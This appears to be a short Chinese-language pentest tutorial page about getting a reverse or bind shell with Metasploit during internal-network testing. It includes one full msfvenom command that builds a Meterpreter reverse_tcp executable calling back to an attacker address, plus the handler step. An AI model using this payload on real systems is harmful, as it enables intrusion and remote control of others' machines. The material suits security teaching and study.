Skip to content

Latest commit

 

History

History
40 lines (20 loc) · 1.7 KB

48844125821118.md

File metadata and controls

40 lines (20 loc) · 1.7 KB

#MSF内网渗透系列-反弹shell

tags: 没有分类,

MSF内网渗透系列-反弹shell

渗透测试时,通过WEB漏洞,拿到了目标网络边缘服务器的webshell,或者通过社工钓鱼,控制了目标办公网络中的一台个人机。

那么结下来就是利用MSF反弹回一个shell,开始在内网扩大我们的战果。

接下来介绍几个基本概念:

payload,又称为攻击载荷。想要返回一个shell,就要在目标机执行我们的payload

正向shell (bind),需要攻击机主动连接目标端口,如windows/shell/bind_tcp和windows/meterpreter/bind_tcp这两个payload,就会反弹一个正向的shell

反向shell(reverse),目标机会反连接攻击机,如windows/shell/reverse_tcp和windows/meterpreter/reverse_tcp,就会反弹一个反向的shell

meterpreter,Metasploit的一个payload,它具有强大的功能,其具备端口转发和socks代理功能简直就是内网渗透测试神器,windows/meterpreter/reverse_tcp和windows/meterpreter/bind_tcp就会反弹一个meterpreter的shell

在Linux下,那么payload可以选择python/meterpreter/reverse_https

以在window下反弹一个meterpreter的shell为例:

首先利用msfvenom生成我们payload的执行程序:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.166 LPORT=1234 -f exe > ./test.exe

在目标机192.168.31.196上执行test.exe,使用exploit/multi/handler模块监听,如图,可以看到返回了一个meterpreter的shell

image_48844528448258